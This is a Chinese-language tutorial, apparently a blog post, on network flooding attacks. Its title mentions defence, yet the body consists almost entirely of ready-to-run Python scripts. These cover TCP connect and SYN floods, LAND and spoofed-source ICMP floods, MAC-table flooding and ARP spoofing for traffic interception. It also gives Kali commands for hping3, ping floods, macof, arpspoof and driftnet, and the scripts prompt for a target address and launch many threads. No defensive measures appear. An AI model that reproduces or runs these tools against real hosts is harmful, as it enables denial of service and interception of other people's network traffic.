《网络安全中的“泛洪”攻击：揭秘、防范与应对策略》

各类泛洪攻击总结

IPV4泛洪

一、什么是泛洪?

泛洪的基本原理就是基于协议通信，完成大流量高并发操作，导致目标主机各类资源消耗过多而无法提供正常的服务。基于多线程或多进程（MAC地址泛洪，ARP泛洪欺骗）。

(1) 攻击端与目标主机之间能够正常通信。

(2) 目标主机没有配置很好防御措施。

二、使用socket三次握手泛洪

import socketimport threadingdef socket_flood(ip, port): while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) # 设置超时时间为1秒 s.connect((ip, port)) except socket.error: pass # 忽略连接错误if __name__ == '__main__': def is_valid_ip(ip): parts = ip.split('.') if len(parts) != 4: return False for part in parts: if not part.isdigit() or not 0 <= int(part) <= 255: return False return True def is_valid_port(port): try: port = int(port) return 0 <= port <= 65535 except ValueError: return False target_ip = input("请输入ipv4地址\n") while not is_valid_ip(target_ip): target_ip = input("无效的IP地址，请重新输入\n") target_port = input("请输入port端口号\n") while not is_valid_port(target_port): target_port = input("无效的端口号，请重新输入\n") for i in range(500): threading.Thread(target=socket_flood, args=(target_ip, int(target_port))).start()

三、使用scapy半连接泛洪

import scapyfrom scapy.layers.inet import IP, TCPfrom scapy.sendrecv import sendimport threadingdef scapy_flood(ip, port): while True: try: pkg = IP(dst=ip) / TCP(dport=port, flags='S') send(pkg, verbose=False) except Exception as e: print(f"发送数据包失败: {e}") breakdef is_valid_ip(ip): parts = ip.split('.') if len(parts) != 4: return False for part in parts: if not part.isdigit() or not 0 <= int(part) <= 255: return False return Truedef is_valid_port(port): try: port = int(port) return 0 <= port <= 65535 except ValueError: return Falseif __name__ == '__main__': target_ip = input("请输入ipv4地址\n") while not is_valid_ip(target_ip): target_ip = input("无效的IP地址，请重新输入\n") target_port = input("请输入port端口号\n") while not is_valid_port(target_port): target_port = input("无效的端口号，请重新输入\n") for i in range(500): # 减少线程数量以避免资源耗尽 threading.Thread(target=scapy_flood, args=(target_ip, int(target_port))).start()

四、使用TCP Land泛洪

import randomimport threadingfrom scapy.layers.inet import IP, TCPfrom scapy.sendrecv import senddef TCP_Land(ip, port): try: while True: sport = random.randint(1, 65535) pkg = IP(src=ip, dst=ip) / TCP(sport=sport, dport=port, flags='S') send(pkg, verbose=False) except Exception as e: print(f"线程 {threading.current_thread().name} 发生错误: {e}")def is_valid_ip(ip): parts = ip.split('.') if len(parts) != 4: return False for part in parts: if not part.isdigit() or not 0 <= int(part) <= 255: return False return Truedef is_valid_port(port): try: port = int(port) return 0 <= port <= 65535 except ValueError: return Falseif __name__ == '__main__': target_ip = input("请输入ipv4地址\n") while not is_valid_ip(target_ip): target_ip = input("无效的IP地址，请重新输入\n") target_port = input("请输入port端口号\n") while not is_valid_port(target_port): target_port = input("无效的端口号，请重新输入\n") threads = [] for i in range(50): # 减少线程数量以避免资源耗尽 t = threading.Thread(target=TCP_Land, args=(target_ip, int(target_port)), name=f"Attacker-{i + 1}") t.start() threads.append(t) for t in threads: t.join()

五、使用ICMP泛洪

import threadingfrom scapy.layers.inet import IP, ICMPfrom scapy.sendrecv import senddef icmp_flood(send_ip, ip): while True: pkg = IP(src=send_ip, dst=ip) / ICMP() send(pkg, verbose=False)def is_valid_ip(ip): parts = ip.split('.') if len(parts) != 4: return False for part in parts: if not part.isdigit() or not 0 <= int(part) <= 255: return False return Trueif __name__ == '__main__': target_send_ip = input("请输入发送方ipv4地址\n") while not is_valid_ip(target_send_ip): target_send_ip = input("无效的发送方IP地址，请重新输入\n") target_ip = input("请输入ipv4地址\n") while not is_valid_ip(target_ip): target_ip = input("无效的IP地址，请重新输入\n") threads = [] for i in range(50): # 减少线程数量以避免资源耗尽 t = threading.Thread(target=icmp_flood, args=(target_send_ip, target_ip), name=f"ICMP-Flood-{i + 1}") t.start() threads.append(t) for t in threads: t.join()

六、ICMP广播风暴

​ 就是把要攻击ipv4设为结尾255

七、使用Ping命令泛洪

​ 1、kali -i命令，可以把每次ping时间间隔设短

​ 2、将ping的数据包设大

eg:ping -i 0.001 -s 2000 [ipv4地址]

八、泛洪工具

​ 1、kali:hping3

eg:hping3 --flood -S --rand-source -p 端口 目标IP

​ 2、Web压力测试

kali:ab eg:ab -n 1000000 -c 1000 目标网址kali:wrk eg:wrk -c 10000 -d 200s -t 5 目标网址

MAC泛洪

MAC泛洪基本攻击原理

​ 1、定义任意数据包，并生成随机MAC地址，不停的发送该条数据。

​ 2、该条数据则会流向交换机，而此时交换机会发现源MAC地址在MAC表里面不存在。

​ 3、如果发送的数据量很大，则会填满MAC表，导致新的数据包无法添加到mac表里面，此时，理论上来说交换机会进行广播。

​ 4、一旦交换机进行数据广播，则会导致整个局域网的流量全员可见。

​ 5、MAC地址泛洪也存在其他情况，比如交换机崩溃，或者整个局域网无法上网等情况。MAC地址组合数量是，16**12

​ 6、混杂模式：默认情况下，vmware使用的是混杂模式，整个网络通信过程类似于广播，任意网段内的流量均会被其他主机监听。

​ vmware禁用混杂模式：打开vmx编辑器输入,ethernet0.noPromisc = "TRUE"。

实现mac泛洪

​ kali 桥接出来，使用macof

python实现

import loggingimport threading# MAC泛洪import timefrom scapy.layers.inet import IPfrom scapy.layers.l2 import Etherfrom scapy.sendrecv import sendfrom scapy.volatile import RandMAC, RandIP# 配置日志记录logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')# 定义常量INTERFACE_NAME = 'Microsoft Wi-Fi Direct Virtual Adapter'PACKET_RATE = 0.01 # 每秒100个数据包NUM_THREADS = 5def mac_flood(): try: while True: randmac = RandMAC() srandip = RandIP() drandip = RandIP() # srandip = ".".join(str(random.randint(1, 254)) for _ in range(4)) # drandip = ".".join(str(random.randint(1, 254)) for _ in range(4)) packet = Ether(src=randmac, dst="ff:ff:ff:ff:ff:ff") / IP(src=srandip, dst=drandip) send(packet, iface=INTERFACE_NAME, verbose=0) logging.debug(f"Sent packet with src MAC: {randmac}, src IP: {srandip}, dst IP: {drandip}") time.sleep(PACKET_RATE) except Exception as e: logging.error(f"Error in mac_flood thread: {e}")if __name__ == '__main__': threads = [] for _ in range(NUM_THREADS): thread = threading.Thread(target=mac_flood) thread.daemon = True # 设置为守护线程，主线程结束时自动退出 thread.start() threads.append(thread) try: for thread in threads: thread.join() except KeyboardInterrupt: logging.info("Stopping mac flood attack...")

ARP攻击与欺骗

​ 1、kali安装dsniff(语法，apt-get -y install dsniff)，arp -a查看mac。

​ 2、找到被攻击ip与mac,攻击方ip与mac,网关的ip与mac，核心所在，欺骗被攻击者把攻击mac认为网关mac。

​ 1、kali arp泛洪

eg:arpspoof -i eth0 -t 攻击ip 网关ip

​ 2、kali arp欺骗

eg:arpspoof -i eth0 -t 攻击ip 网关ip(需提前输入：echo 1 >> /proc/sys/net/ipv4/ip_forward)

​ 3、kali使用driftnet:安装语法同上。

eg:driftnet -i eth0

使用scapy完成ARP欺骗

​ 1、攻击主机需要欺骗被攻击主机，让被攻击主机把攻击主机视为网关，出口流量可以经过该网关，另外，攻击主机还需要欺骗网关。

​ 让网关认为，入口流量的目的地就是攻击主机。

python实现

import timeimport loggingfrom scapy.layers.l2 import Ether, getmacbyip, ARPfrom scapy.sendrecv import sendpfrom scapy.volatile import RandMACdef arp_spoof(target_ip, target_mac, gateway_ip, iface="Microsoft Wi-Fi Direct Virtual Adapter"): try: gateway_mac = getmacbyip(gateway_ip) if not gateway_mac: logging.error(f"无法获取网关 {gateway_ip} 的 MAC 地址") return except Exception as e: logging.error(f"获取网关 MAC 地址时出错: {e}") return # 使用攻击者的实际 MAC 地址 attacker_mac = RandMAC() # 请替换为实际的 MAC 地址 while True: try: # op = 1:arp请求 op = 2:arp响应 # 欺骗被攻击主机 packet1 = Ether(src=attacker_mac, dst=target_mac) / ARP(hwsrc=attacker_mac, psrc=gateway_ip, hwdst=target_mac, pdst=target_ip, op=2) sendp(packet1, iface=iface) logging.info(f"发送 ARP 响应欺骗被攻击者 {target_ip} 认为网关是 {gateway_ip}") # 欺骗网关 packet2 = Ether(src=attacker_mac, dst=gateway_mac) / ARP(hwsrc=attacker_mac, psrc=target_ip, hwdst=gateway_mac, pdst=gateway_ip, op=2) sendp(packet2, iface=iface) logging.info(f"发送 ARP 响应欺骗网关 {gateway_ip} 认为被攻击者是 {target_ip}") except Exception as e: logging.error(f"发送 ARP 包时出错: {e}") time.sleep(2)if __name__ == '__main__': logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') target_ip = input("请输入被攻击者的 IP 地址: ") target_mac = input("请输入被攻击者的 MAC 地址: ") gateway_ip = input("请输入网关的 IP 地址: ") arp_spoof(target_ip, target_mac, gateway_ip)